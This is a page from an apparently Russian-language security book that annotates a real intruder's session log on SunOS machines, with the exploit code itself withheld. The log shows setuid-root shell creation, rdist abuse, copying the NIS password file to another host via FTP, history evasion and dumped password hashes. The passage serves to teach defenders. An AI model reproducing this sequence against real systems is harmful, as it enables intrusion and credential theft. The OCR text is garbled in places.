LINEBURG


<< Пред. стр.

страница 18
(всего 25)

ОГЛАВЛЕНИЕ

След. стр. >>

101 # ed c.c
102 ?c,c: No such file or directory
103 # c d
104 # edc.c
Что делал хакер...
150


105/uid/
106setuid(21477);
107setuid(13147);
108#ссс.с
109 # mv a.out shit
110 #chmod 6777 shit
111 #./shit
112 $ id
113 uid=13147(jeff) gid=0(wheel) groups=7
114 $ rlogj tsunami
115 rlogj: not found
116$ rlogin tsunami
117 No directory! Logging in with home=/
118 SunOS Release 4.1.2 (TSUNAMI) #3: Sat Oct 24 07:56:45 PDT
1992
119 You have new mail.


Строки с № 120 по № 126
Хакер (который сейчас является пользователем jeff), запускает командную оболочку sh,
чтобы не оставлять след в журналах .history оболочки csh. (Хакер тщательно следит
за тем, чтобы не оставить свидетельств применения своих команд.) Затем он проверяет,
нет ли кого еще в системе.

Строки с № 127 по № 136
Хакер пытается скопировать файл паролей и получает отказ в разрешении, так как у него
нет разрешения копировать в этот каталог. Он проводит проверку с целью установить, под
каким именем он зарегистрировался (должно быть, он уже его забыл). Он видит, что заре­
гистрировался как Jeff. Так как Jeff не имеет разрешения копировать файлы в этот каталог,
то хакер меняет каталог на /tmp, в который любому пользователю разрешено производить
копирование.

Строки с № 137 по № 141
Здесь он немного расправляет крылья и ищет таблицу паролей, чтобы ее скопировать и ис­
пользовать. (Он копирует файл паролей NIS в файл, названный "ааа".) Хакеры часто ко­
пируют файлы паролей, чтобы подвергнуть их действию программ-взломщиков и получить
больше паролей. Чем больше паролей есть у хакера, тем лучше он преуспеет в набегах на дру­
гие системы.

120tsunami%AC
121 tsunami%sh
122$ who
123 wendy ttyp2 Jan 6 13:55 (arawana)
124 derek ttyp3 Jan 13 17:57 (lajolla)
125 derekttyp4Jan 15 13:11 (lajolla)
126 jeff ttyp5 Jan 18 23:09 (valley)
127 $cat/etc/passwdAC
Прогулка хакера по сети 151


128$ypcaty"C
129 $ ypcat passwd > suna
130 suna: Permission denied
131 Sid
132 uid=4401(jeff) gid=50(lastaff) groups=50(lastaff)
133$pwd
134 $ c d
135$pwd
. 136$cd/tmp
137$ ypcat passwd >aaa
138 $ Is -tal aa
139 aa not found
140 $ is -tal aaa
141 - r w - r — r — 1 j e f f 15382 Jan 18 23:09 aaa



Строки с № 142 по № 162
Теперь он открывает сессию ftp обратно к первоначальному хосту (valley) как пользова­
тель ingres. В этой сессии он копирует файл паролей в систему valley. В той же самой сес­
сии он копирует свои инструменты по работе с защитой из valley в tsunami.
Строки с № 163 по № 173
Снова он воссоздает свою небольшую С-программу (опущенную по соображениям безо­
пасности) для того, чтобы воспользоваться программной ошибкой, открывающей защиту,
и получить права доступа суперпользователя (root). Теперь он имеет полный контроль
(доступ root) над системой tsunami.

142$ ftp valley
143 Connected to valley
144 220 valley FTP server (SunOS 4.1) ready.
145 Name (valley:jeff): ingres
146 331 Password required for ingres.
147 Password:
148 230 User ingres logged in.
149 ftp> send aaa
150 200 PORT command successful.
151 150 ASCII data connection for aaa
152 226 ASCII Transfer complete.
153 local: aaa remote: aaa
154 15578 bytes sent in 0.063 seconds (2.4e+02 Kbytes/s)
155 ftp> get foo
156 200 PORT command successful.
157 150 ASCII data connection for foo
158 226 ASCII Transfer complete.
159 local: foo remote: foo
160 1155 bytes received in 0.11 seconds (9.9 Kbytes/s)
152 Что делал хакер...


161 ftp> quit
162 221 Goodbye.
163 $ cat too | /usr/ucb/rdist -Server localhost
164$/tmp/sh
165#rmfoo •
166#rm/tmp/sh
167 rm: override protection 755 for /tmp/sh? у
168#edc.c
169#ccc.c
170 #chmod 6777 a.out
171 # ./a.out
172 # id
173 uid=0(root) gid=0(wheel) groups=50(iastaff)



Строки с № 174 по № 182
Хакер ищет, есть ли в файле /etc/passwd какие-нибудь записи password.old или другие из­
менения. Он также пытается изменить пароль Jeff в NIS, но безуспешно.
Строки с № 183 по № 197
На этот раз он выводит список содержимого файла /etc/passwd.

174 # Is -ta! /etc/*ass*
175 -rw-r--r--1 root 634 Dec 7 12:31 /etc/passwd
176#cat/etc/}4U
177passwd
178 cat: /etc/}4: No such file or directory
179 Changing NIS password for jeff on suntzu.
180 Old password:
181 New password:
182 Password unchanged.
• 183 # cat/etc/passwd
184 root:R7QCfnYR4gvzU:0:1 :Operator:/:/bin/csh
185nobody:*:65534:65534::/:
186daemon:*;1:1::/:
187sys:*:2:2::/:/bin/csh
188bin:*:3:3::/bin:
189 uucp:*:4:8::/var/spool/uucppublic:
190 news:*:6:6::/var/spool/news:/bin/csh
191 ingres:*:7:7::/usr/ingres:/bin/csh
192 audit:*:9:9::/etc/security/audit:/bin/csh
193 sync: :1:1::/:/bin/sync
194 sysdiag:*:0;1:Old System Diag:/usr/diag/sysdiag:/usr/diag/
sysdiag/sysdiag
sundiag:*:0:1 :System Diag :/usr/diag/su ndiag :/usr/diag/
sundiag/ sundiag
153
Прогулка хакера по сети


195 operator: INtDk7crldKh2:5:5 -Account forbackups;/usr/ backup:
/bin/csh
196 lc:u0gFO1zE9Yx9U:27:50:LC Calendar:/var/lc:/bin/csh
197+::0;0:::



Строки с № 198 по № 209
Хакер меняет ID пользователя с суперпользователя обратно на jeff. Затем он повторно
проверяет свой ID пользователя и начинает менять имя своего a.out на такое, которое он не
забудет (как он уже прежде делал). Снова он запускает команду ls -1 для получения списка
с новейшими файлами в начале его.
Строки с № 210 по № 212
Он удаляет свою локальную копию файла паролей NIS ("ааа"). Он уже скопировал этот
файл на хост valley, поэтому здесь он ему не нужен. Затем удаляет свой исполняемый код
и готов идти дальше.
Строки с № 213 по № 227
Хакер проверяет, какие файловые системы подмонтированы.

198 #4)
199 # id
200 uid=4401 (jeff) gid=50(iastaff) euid=0(root)
groups=50(lastaff)
201 # тс^С
202 # mv^С
203 #mv a.out shit
204 # Is -tal
205 total 2415
206 drwxrwsrwx 3 bin 1024 Jan 18 23:12 .
207 -rwsrwsrwx 1 root 24576 Jan 18 23:11 shit
208-rw-r-r-- 1 root 61 Jan 18 23:11 c.c
209 -rw-r-r- 1 jeff 15382 Jan 18 23:09 aaa
210#rmaaa
' 211 #rmc.c
212 rm: override protection 644 for c.c? у
213 # d f
214 Filesystem kbytes used avail capacity Mounted on
215 /dev/sdOa 10483 5081 4354 54% /
216 /dev/sdOg 96943 78335 8914 90% /usr
217 /dev/sdOe 22927 3111 17524 15%/var
218 /dev/sd1h 1255494 1081249 48696 96% /home
219 /dev/sd3h 1255494 1030386 99559 9 1 % /home/se
220 la:/usr/local 2097151 1154033 692365 63% /usr/local
221 suntzu:/var/spool/mail
222 445852 334295 66972 83% /var/spool/mail
154 Что делал хакер...


223 mfp:/home/sybase 318991 244337 42755 85% /home/sybase
224 арр1 :/export/sun/sun4/openwin-3,0
225 189858 131073 39799 77% /usr/openwin
226 арр1 :/export/apps 1255494 771887 358057 68% /export/apps
227 appl :/export/apps 1255494 771887 358057 68% /usr/local


Строки с № 228 по № 229
Неверный ввод или, возможно шумы в линии.
Строки с № 230 по № 258
Хакер ищет личные каталоги пользователей, находит каталог wendy и становится пользо­
вателем wendy. Но ненадолго, потому что по каким-то причинам он решает поискать поль­
зователя dan. Вероятно, хакер уже знает, что dan существует.

228 # irG-cd /home/se
229 irG-cd: not found
230 # cd/home/se
231 # Is
232 cmeyer hamant lost+found mikec wendy
233 colleen Joseph mark mikep
234 derek kevin matthews neally
235 # cd wendy
236 # cp Дтр/shit.
237 # Is -tal shit
238 -rwxr-xr-x 1 root 24576 Jan 18 23:13 shit
239 # chmod 6777 shit
240 # Is -tal shit
241 -rwsrwsrwx 1 root 24576 Jan 18 23:13 shit
242 # pwd
243 /home/se/wendy
244 # cd Amp
245 # Is -tal | more
246 total 2398
247 drwxrwsrwx 3 bin 1024 Jan 18 23:13 .
248 -rwsrwsrwx 1 root 24576 Jan 18 23:11 shit
249 -rwxr-xr-x 1 cmeyer 41 Jan 13 12:31 junk
250-rw-r--r- 1 cmeyer 12 Jan 13 12:05 junk.dat
251 -rw-r-r- 1 derek 0 Jan 12 16:07 6310
252 (16 строк вывода удалены и хакер стал пользователем wendy)
253 hacker typos
254 # rm shit
255 # grep dan/etc/passwd
256 # ypcat passwd | grep dan
257danf:*:13602:50::/home/guest/danf:/bin/csh
258 dan:*H.6Haolt2xDu2:13601:50:& :/home/guest/dan:/bin/csh
155
Прогулка хакера по сети


Строки с № 259 по № 263
Еще несколько тревожных взглядов вокруг (с помощью who).
Строки с № 264 по № 273
Он снова превращается в jeff. Очевидно, что реальный jeff был в системе немного раньше
хакера, который входит сейчас в suntzu как jeff. И снова пароля не требуется.
Строка № 274
Другая смена оболочки, чтобы не оставлять отметки о себе в журналах history.
Строки с № 275 по № 281
Хакер пытается убедиться, что /home/se подмонтирован из хоста tsunami. (Если вы помни­
те, в /home/se/wendy он оставил свой исполняемый код. Ему это было нужно для получе­
ния доступа с правами суперпользователя к этому новому хосту.)

259 # who
260 wendy ttyp2 Jan 6 13:55 (arawana)
261 derekttyp3Jan 13 17:57 (lajolla)
262 derek ttyp4 Jan 15 13:11 (lajolla)
263 jeff ttyp5 Jan 18 23:09 (valley)
264 #T>
265 $ id
266 uid=4401(jeff) gid=50(lastaff) groups=50(lastaff)
267 $ rlogin suntzu
268 Last login: Thu Jan 14 06:35:30 on ttyhl
269 SunOS Release 4.1.2 (SUNTZU.X) #2: Fri Oct 23 22:25:48 PDT
1992
270 You have new mail.
271 suntzu% who
272 jeff ttyp0 Jan 18 23:14
273 (tsunami)
274 suntzu% sh
275 $ df
276 Filesystem kbytes used avail capacity Mounted on
277 /dev/sd6a 14983 11056 2429 82% /
278 /dev/sd6g 91998 76365 6434 92% /usr
279 /dev/sd6h 445852 334297 66970 83% /var
280 /dev/sd4c 1255494 1030410 99535 91 % /home/se
281 tsunami:/home/se 1255494 1030410 99535 9 1 % Ampjnnt/
home/se
156 Что делал хакер...


Строки с № 282 по № 287
Хакер применяет свой исполняемый код и получает права суперпользователя на доступ
к системе suntzu. В итоге он уже скомпрометировал три системы.
Строки с № 288 по № 292
Он снова ищет пароли. (Кажется, это становится уже знакомым?)
Строки с № 293 по № 317
Хакер переходит к гостевому личному каталогу и выводит список его содержимого. Он за­
мечает в личном каталоге файл под именем dan/test.
Строка № 318
Я удалила несколько строк из соображений конфиденциальности.

282 $ cd /home/se/wendy
283 $ Is -tal shit
284 - rwsrwsrwx 1 root 24576 Jan 18 23:13 shit
285 $ ./shit
286 # id
287 uid=0(root) gid=0(wheel) groups=50(lastaff)
288 # Is -tal /etcfass*
289 -rw-r-r--1 root 15465 Jan 1514:29/etc/passwd
290 -rw-r-r--1 root 15462 Dec 28 17:58/etc/passwd.OLD
291 -rw-r--r--1 root 15514 Nov 12 18:58/etc/passwd.old
292 -rw-r--r--1 root 15215 Sep 9 10:02 /etc/passwd-
293 # cd /home/guests
294 /home/guests: bad directory
295 # cd /home/guest
296 # Is -tal
297 total 56
298 dr-xr-xr-x 10 root 512 Jan 18 23:15 ..
299 drwxr-xr-x 9 guestl 1024 Jan 15 16:21 guestl
300 drwxr-xr-x 11 тагу 1536 Jan 1417:37 тагу
301 drwxr-xr-x 5 jeffs 512 Jan 12 15:57 jeffs
302 drwxr-xr-x 3 eddie 512 Jan 813:04 eddie
303 drwxr-xr-x 3 sunwise 512 Jan 8 09:36 sunwise
304 drwxrwxrwx 3 brad 512 Jan 6 15:43 dan
305 # Is -tsl dan
306 total 1450
307 1 -rw-r--r- 1 6553434 Jan 6 15:43 test
308 264 -rw-r-r- 1 dan 255563 Jul 8 1992 packet.dat
309 56 -rwxr-xr-x 3 dan 57344 Jul 1 1992 sz
310 56 -rwxr-xr-x 3 dan 57344 Jul 1 1992 sx
311 56 -rwxr-xr-x 3 dan 57344 Jul 1 1992 sb
312 40 -rwxr-xr-x 3 dan 40960 Jul 1 1992 rx
313 40 -rwxr-xr-x 3 dan 40960 Jul 1 1992 rb
314 40 -rwxr-xr-x 3 dan 40960 Jul 1 1992 rz
157
Прогулка хакера по сети


315 896-rw-rw-rw-1 dan 901682 Jun 16 1992junk,2
3161 drwxr-xr-x 2 dan 512 Oct 25 1990 doswin
317 # cat dan/test
318 Код удален по соображениям безопасности



Строка № 319
Теперь хакер ищет, кому принадлежит UID 65534, Выходит так, что этот пользователь­
ский ID не принадлежит никому.
Строки с № 320 по № 393
Здесь он смотрит, нет ли других пользователей в системе. Его особенно интересуют те
учетные записи пользователей, которые не использовались недавно, Это нужно для того,
чтобы никто не заметил, как он ими пользуется. Для поиска неактивных учетных записей
хакер ищет каталоги, в которых не было недавнего обращения к их файлам. Он также про­
сматривает время последних входов пользователей в систему.

319 # grep 65534 /etc/passwd
32Q#cd/home/se
321 # Is -tal
322 total 44
323 dr-xr-xr-x 10 root 512 Jan 18 23:15..
324 drwxr-xr-x 17 wendy 2560 Jan 18 23:13 wendy
325 drwxr-xr-x 26 hamant 4608 Jan 18 17:28 hamant
326 drwxr-xr-x 48 neally 9728 Jan 18 11:03 neally
327 drwxr-xr-x 41 derek 3584 Jan 16 03:16 derek
328 drwxr-xr-x 17 kevin 2048 Jan 15 17:04 kevin
329 drwxr-xr-x 31 mark 3072 Jan 15 16:41 mark
330 drwxr-xr-x 19 colleen 1536 Jan 15 16:15 colleen
331 drwxr-xr-x 44 matthews 4608 Jan 15 11:37 matthews
332 drwxr-xr-x 16 mikep 1536 Jan 15 11:24 mikep
333 drwxr-xr-x 2 10406 512 Dec 2 11:35 mikec
334 drwxr-xr-x 24 cmeyer 2048 Dec 1 11:11 cmeyer
335 drwxr-xr-x 15 root 512 Sep 15 17:04.
336 drwxr-xr-x 8 5542 1536 Aug 28 15:13 Joseph
337 drwxr-xr-x 2 root 512 Jul 17 1991 lost+found
338 # last ] grep eric
339 ericz ttyh 1 Mon Jan 18 08:30 - 08:32 (00:02)
, 340 ericz ttyh 1 Aug 30 14:25 -14:25 (00:00)
341 ericz ttyhKC


342 # id344 # grep eric /etc/passwd
345 Uace:LEkQ/KdKGcyV2:4:4:ACE:/usr/spool/uucppublic: /usr/ lib/
uucp/uucico
346 Uaim:93uUCUdUU6zdl:4:4:AIM:/usr/spool/uucppublic: /usr/ lib/
uucp/uucico
347 ericz:vt0R/k7x2W1 kY:3063:50::/home/region3/ericz:/bin/csh
348 ericc:23JjW1a5hqUSQ:4094:10:& :/home/guest/eric:/bin/csh
349 # last ericc
350 ericc ttypl ptero Mon Aug 3 18:52 -18:52 (00:00)
351 wtmp begins Wed Jul 1 18:46
352 # last richp
353 richp ttypO awe Sat Jan 16 19:33 - 19:34 (00:00)
354 richp ttyp4 vela Mon Jan 11 15:59 - 16:00 (00:00)
355 richp ttyp8 vela Wed Oct 7 13:28 • 13:58 (00:29)
356 richp ttyhl Mon Oct 5 15:39- 15:41 (00:01)
357richpttyhl MonOct5 14:15- 14:18(00:02)

<< Пред. стр.

страница 18
(всего 25)

ОГЛАВЛЕНИЕ

След. стр. >>

Copyright © Design by: Sunlight webdesign